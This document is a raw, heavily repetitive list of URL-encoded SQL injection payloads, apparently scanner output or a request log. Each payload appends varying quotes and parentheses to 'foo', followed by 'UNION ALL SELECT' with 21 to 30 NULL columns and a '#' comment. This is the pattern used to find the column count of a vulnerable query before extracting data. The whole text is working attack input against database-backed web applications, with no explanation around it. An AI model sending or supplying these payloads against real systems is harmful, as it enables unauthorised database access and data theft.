foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 